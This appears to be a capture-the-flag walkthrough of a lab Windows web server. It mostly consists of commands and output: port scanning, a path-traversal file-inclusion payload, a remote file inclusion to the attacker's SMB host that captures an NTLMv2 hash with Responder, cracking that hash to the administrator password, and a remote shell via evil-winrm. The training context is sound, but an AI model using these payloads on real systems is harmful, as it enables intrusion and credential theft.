ip
10.129.81.165
nmap
nmap -sC -sV 10.129.81.165
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-17 00:31 EDT
Nmap scan report for 10.129.81.165
Host is up (0.064s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
nmap -p1-6000 10.129.81.165
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-17 00:33 EDT
Nmap scan report for 10.129.81.165
Host is up (0.064s latency).
Not shown: 5998 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
5985/tcp open wsman
add webpage to host file
echo "10.129.81.165 unika.htb" | sudo tee -a /etc/hosts
The url pages parameter is used to load different versions of the webpage.
Adding ../../../../../../../../windows/system32/drivers/etc/hosts lets us access the hosts file using (LFI) local file include.
http://unika.htb/index.php?page=../../../../../../../../windows/system32/drivers/etc/hosts
# Copyright (c) 1993-2009 Microsoft Corp. # # This is a sample HOSTS file used by Microsoft TCP/IP for Windows. # # This file contains the mappings of IP addresses to host names. Each # entry should be kept on an individual line. The IP address should # be placed in the first column followed by the corresponding host name. # The IP address and the host name should be separated by at least one # space. # # Additionally, comments (such as these) may be inserted on individual # lines or following the machine name denoted by a '#' symbol. # # For example: # # 102.54.94.97 rhino.acme.com # source server # 38.25.63.10 x.acme.com # x client host # localhost name resolution is handled within DNS itself. # 127.0.0.1 localhost # ::1 localhost
gobuster
gobuster dir -u http://10.129.81.165 -w /usr/share/wordlists/dirb/big.txt -t 64 -x .php,.txt,.html
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.81.165
[+] Method: GET
[+] Threads: 64
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,txt,html
[+] Timeout: 10s
===============================================================
2022/07/17 00:40:19 Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd (Status: 403) [Size: 302]
/.htaccess (Status: 403) [Size: 302]
/.htpasswd.php (Status: 403) [Size: 302]
/.htaccess.php (Status: 403) [Size: 302]
/.htpasswd.txt (Status: 403) [Size: 302]
/.htaccess.txt (Status: 403) [Size: 302]
/.htaccess.html (Status: 403) [Size: 302]
/.htpasswd.html (Status: 403) [Size: 302]
/Index.php (Status: 200) [Size: 61]
/English.html (Status: 200) [Size: 46453]
/aux (Status: 403) [Size: 302]
/aux.php (Status: 403) [Size: 302]
/aux.txt (Status: 403) [Size: 302]
/aux.html (Status: 403) [Size: 302]
/cgi-bin/ (Status: 403) [Size: 302]
/cgi-bin/.html (Status: 403) [Size: 302]
/com1.html (Status: 403) [Size: 302]
/com3.php (Status: 403) [Size: 302]
/com2.php (Status: 403) [Size: 302]
/com4 (Status: 403) [Size: 302]
/com1 (Status: 403) [Size: 302]
/com2.txt (Status: 403) [Size: 302]
/com3.txt (Status: 403) [Size: 302]
/com4.html (Status: 403) [Size: 302]
/com1.php (Status: 403) [Size: 302]
/com2.html (Status: 403) [Size: 302]
/com3.html (Status: 403) [Size: 302]
/com4.php (Status: 403) [Size: 302]
/com3 (Status: 403) [Size: 302]
/com2 (Status: 403) [Size: 302]
/com1.txt (Status: 403) [Size: 302]
/com4.txt (Status: 403) [Size: 302]
/con (Status: 403) [Size: 302]
/con.php (Status: 403) [Size: 302]
/con.txt (Status: 403) [Size: 302]
/con.html (Status: 403) [Size: 302]
/css (Status: 301) [Size: 336] [--> http://10.129.81.165/css/]
/english.html (Status: 200) [Size: 46453]
/examples (Status: 503) [Size: 402]
/french.html (Status: 200) [Size: 47199]
/german.html (Status: 200) [Size: 46984]
/img (Status: 301) [Size: 336] [--> http://10.129.81.165/img/]
/inc (Status: 301) [Size: 336] [--> http://10.129.81.165/inc/]
/index.php (Status: 200) [Size: 61]
/js (Status: 301) [Size: 335] [--> http://10.129.81.165/js/]
/licenses (Status: 403) [Size: 421]
/lpt2 (Status: 403) [Size: 302]
/lpt1 (Status: 403) [Size: 302]
/lpt2.php (Status: 403) [Size: 302]
/lpt1.php (Status: 403) [Size: 302]
/lpt1.txt (Status: 403) [Size: 302]
/lpt2.txt (Status: 403) [Size: 302]
/lpt1.html (Status: 403) [Size: 302]
/lpt2.html (Status: 403) [Size: 302]
/nul.txt (Status: 403) [Size: 302]
/nul.html (Status: 403) [Size: 302]
/nul (Status: 403) [Size: 302]
/nul.php (Status: 403) [Size: 302]
/phpmyadmin (Status: 403) [Size: 421]
/prn (Status: 403) [Size: 302]
/prn.php (Status: 403) [Size: 302]
/prn.txt (Status: 403) [Size: 302]
/prn.html (Status: 403) [Size: 302]
/secci� (Status: 403) [Size: 302]
/secci�.php (Status: 403) [Size: 302]
/secci�.txt (Status: 403) [Size: 302]
/secci�.html (Status: 403) [Size: 302]
/server-status (Status: 403) [Size: 421]
/server-info (Status: 403) [Size: 421]
/webalizer (Status: 403) [Size: 421]
responder
sudo responder -I tun0
Poisoners: LLMNR [ON] NBT-NS [ON] MDNS [ON] DNS [ON] DHCP [OFF]
Servers: HTTP server [ON] HTTPS server [ON]` Link to heading
Perform (RFI) remote file inclusion by adding //10.10.16.17/somefile to end of the page parameter with responder running to capture the NTLM hash.
http://unika.htb/index.php?page=//10.10.16.17/somefile
[SMB] NTLMv2-SSP Client : ::ffff:10.129.81.165 [SMB] NTLMv2-SSP Username : RESPONDER\Administrator [SMB] NTLMv2-SSP Hash : Administrator::RESPONDER:3ba223fc6c4554d8:28579606A2606C45DBECEACFB4D8EC83:0101000000000000800BE3917C99D801028DF3910C859C83000000000200080033005A003400500001001E00570049004E002D0049003300360032005A004E004C00420035003800580004003400570049004E002D0049003300360032005A004E004C0042003500380058002E0033005A00340050002E004C004F00430041004C000300140033005A00340050002E004C004F00430041004C000500140033005A00340050002E004C004F00430041004C0007000800800BE3917C99D801060004000200000008003000300000000000000001000000002000000520202475D396CDBD4BE6E48ECE80B7BA262AE0D28ACC598F91949A0FC6301B0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00310037000000000000000000
nano (the hash to) -> nthash.txt
john
john -w=/usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt nthash.txt
Password: badminton User: (Administrator)
evil-winrm
evil-winrm -i 10.129.81.165 -u administrator -p badminton
Evil-WinRM shell v3.4
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
From there move around with ls and cd to C:\Users\mike\Desktop to find flag.txt
flag.txt = ea81b7afddd03efaa0945333ed147fac